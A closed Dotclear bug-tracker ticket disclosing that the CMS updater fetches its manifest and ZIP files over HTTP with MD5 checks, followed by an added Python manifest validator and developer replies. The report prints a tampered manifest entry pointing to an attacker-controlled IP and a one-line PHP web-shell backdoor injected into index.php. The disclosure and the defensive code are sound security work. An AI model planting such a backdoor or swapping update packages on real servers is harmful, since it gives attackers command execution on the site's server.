Ticket #2305 (closed defect: fixed)
Security issue - Update process
Reported by: | Cervoise | Owned by: | team
---|---|---|---
Priority: | normal | Milestone: | 2.16
Component: | security | Version: | 2.15.3
Severity: | normal | Keywords: |
Cc: | | |
Description
I have found security issues in the automatic update functionality of Dotclear.
In order to get the latest version, the following resource is requested by the server: http://download.dotclear.org/versions.xml. The download.dotclear.org server replies with an XML file containing the latest versions and the MD5 sum of each ZIP file:
<?xml version="1.0" encoding="UTF-8"?>
<versions>
  <subject name="dotclear">
    <release name="stable" version="2.15.3" href="http://download.dotclear.org/latest/dotclear-2.15.3.zip" checksum="80fb71d34b6c971e83d084af0ebac35f" info="http://services.dotclear.net/redir?about=dotclear-2.15.3" php="5.6" />
    <release name="testing" version="2.15.2-r201910030959" href="http://download.dotclear.org/nightly/dotclear-2.15.2-r201910030959.zip" checksum="f68721637305432fb920b0f9c005accf" info="http://services.dotclear.net/redir?about=dotclear-testing" php="5.6" />
    <release name="unstable" version="2.16-dev-r201910011045" href="http://download.dotclear.org/nightly/unstable/dotclear-2.16-dev-r201910011045.zip" checksum="ab9dd58eb309f7a34d83b31c310313f6" info="http://services.dotclear.net/redir?about=dotclear-dev" php="5.6" />
  </subject>
</versions>
If a new version is available, the latest version file is downloaded and the patch is applied. In order to let the administrator revert the update, a backup file is created in the root directory of the web application:
/var/www/html$ ls dotclear
admin              CHANGELOG        db         LICENSE  public     var
backup-2.15.2.zip  CONTRIBUTING.md  inc        locales  README.md
cache              CREDITS          index.php  plugins  themes
In order to apply the update, the file list in /inc/digests is used to know which files were updated, so that only the needed files are backed up and updated. There is a vulnerability in this process. If an attacker can intercept requests on the network (for example with a man in the middle), he can replace the response of download.dotclear.org/versions.xml in order to force the CMS to download a malicious ZIP file:
<release name="stable" version="2.15.3" href="http://192.168.1.80/dotclear-2.15.3.zip" checksum="2f47c483e983f600f71cc52cc4f5be39" info="http://services.dotclear.net/redir?about=dotclear-2.15.3" php="5.6" />
The provided file is the official patch with only two edits: this line is added to the index.php file: if (isset($_GET['cmd'])) {system($_GET['cmd']);} and the MD5 sum of index.php is changed in inc/digests. This can be corrected by requesting https://download.dotclear.org/versions.xml to get the version and by ensuring that the server returns HTTPS references for downloading the ZIP files.
Note 1: there are no .htaccess files restricting someone from downloading the backup ZIP files or the inc/digest files. These files could help an attacker to find which version of Dotclear is used. It would be better to restrict remote access to these files.
Note 2: for the full process, MD5 is used to check file integrity. This algorithm is no longer recommended for this usage.
Note 3: I tried to report this using security(@)dotclear.net (http://dev.dotclear.org/2.0/) but I did not get any reply.
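The following Python script is an added illustration and is not part of the ticket nor Dotclear's own updater. It parses a manifest in the shape of versions.xml above, applies the HTTPS-only rule proposed in the report to the release href, goes one step further by pinning the download host, and verifies the downloaded archive with SHA-256 while refusing a manifest that only carries an MD5 sum (Note 2). The allowed host, the archive bytes and the three manifests are constructed for the example; the tampered entry reuses the href and MD5 sum quoted in the report.

```python
from __future__ import annotations

import hashlib
import hmac
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumption for this example: the only host an update archive may come from.
ALLOWED_HOST = "download.dotclear.org"


class ManifestError(ValueError):
    """Raised when the manifest or the downloaded archive fails a check."""


@dataclass(frozen=True)
class Release:
    name: str
    version: str
    href: str
    checksum: str


def parse_manifest(xml_text: str, subject: str = "dotclear") -> list[Release]:
    """Parse the <versions><subject><release/> layout shown in the ticket."""
    root = ET.fromstring(xml_text)
    releases = []
    for subj in root.findall("subject"):
        if subj.get("name") != subject:
            continue
        for rel in subj.findall("release"):
            try:
                releases.append(Release(rel.attrib["name"], rel.attrib["version"],
                                        rel.attrib["href"],
                                        rel.attrib["checksum"].strip().lower()))
            except KeyError as missing:
                raise ManifestError(f"release entry lacks attribute {missing}") from None
    return releases


def check_download_url(href: str) -> None:
    """Refuse links that are not HTTPS or that point away from the expected host."""
    url = urlparse(href)
    if url.scheme != "https":
        raise ManifestError(f"non-HTTPS download link: {href}")
    if url.hostname != ALLOWED_HOST:
        raise ManifestError(f"unexpected download host: {url.hostname}")


def verify_archive(data: bytes, expected: str) -> str:
    """Compare the archive's SHA-256 with the manifest; a 32-hex MD5 value is refused."""
    if len(expected) == 32:
        raise ManifestError("manifest offers only an MD5 checksum; SHA-256 is required")
    if len(expected) != 64:
        raise ManifestError("unrecognised checksum format")
    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected):  # constant-time comparison
        raise ManifestError("archive digest does not match manifest")
    return actual


def validate_update(xml_text: str, archive: bytes, channel: str = "stable") -> tuple[bool, str]:
    """Run every check for one channel and report (ok, reason) instead of raising."""
    try:
        release = next((r for r in parse_manifest(xml_text) if r.name == channel), None)
        if release is None:
            raise ManifestError(f"no {channel} release in manifest")
        check_download_url(release.href)
        verify_archive(archive, release.checksum)
    except (ManifestError, ET.ParseError) as err:
        return False, str(err)
    return True, f"{release.name} {release.version} verified"


# Constructed stand-in for a downloaded archive (not a real ZIP).
GOOD_ARCHIVE = b"PK\x03\x04 constructed stand-in for dotclear-2.15.3.zip"

# Constructed manifests: a hardened one (HTTPS link, SHA-256 of the stand-in),
# the attacker-rewritten entry from the ticket, and an HTTPS one that still
# only publishes the MD5 sum from the ticket.
GOOD_MANIFEST = f"""<?xml version="1.0" encoding="UTF-8"?>
<versions><subject name="dotclear">
  <release name="stable" version="2.15.3" php="5.6"
           href="https://download.dotclear.org/latest/dotclear-2.15.3.zip"
           checksum="{hashlib.sha256(GOOD_ARCHIVE).hexdigest()}" />
</subject></versions>"""

TAMPERED_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<versions><subject name="dotclear">
  <release name="stable" version="2.15.3" php="5.6"
           href="http://192.168.1.80/dotclear-2.15.3.zip"
           checksum="2f47c483e983f600f71cc52cc4f5be39" />
</subject></versions>"""

MD5_ONLY_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<versions><subject name="dotclear">
  <release name="stable" version="2.15.3" php="5.6"
           href="https://download.dotclear.org/latest/dotclear-2.15.3.zip"
           checksum="80fb71d34b6c971e83d084af0ebac35f" />
</subject></versions>"""

if __name__ == "__main__":
    for label, manifest in [("hardened", GOOD_MANIFEST), ("tampered", TAMPERED_MANIFEST),
                            ("md5-only", MD5_ONLY_MANIFEST)]:
        print(label, validate_update(manifest, GOOD_ARCHIVE))
```

The scheme and host checks run before any bytes are trusted, so a rewritten manifest is rejected without downloading; a digest-only check would still pass an attacker's archive whenever the attacker also controls the checksum field, which is why the transport protection and the stronger digest are both needed.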
Change History
comment:2 Changed 6 years ago by franck
« In order to apply the update, files list in /inc/digests is used in order to know updated files and only backup and update needed files. »
It's not really how the digest file is used, as its only purpose is to alert the admin if any currently installed file has been modified since the last update.
comment:3 Changed 5 years ago by franck
- Milestone set to 2.16
About “protection” on inc/digest, there is an .htaccess file which denies all downloads from this folder.
comment:4 Changed 5 years ago by franck
- Status changed from new to closed
- Resolution set to fixed
See updates here → https://git.dotclear.org/dev/dotclear/issues/11
Thanks for the report. We will have a look at this issue ASAP.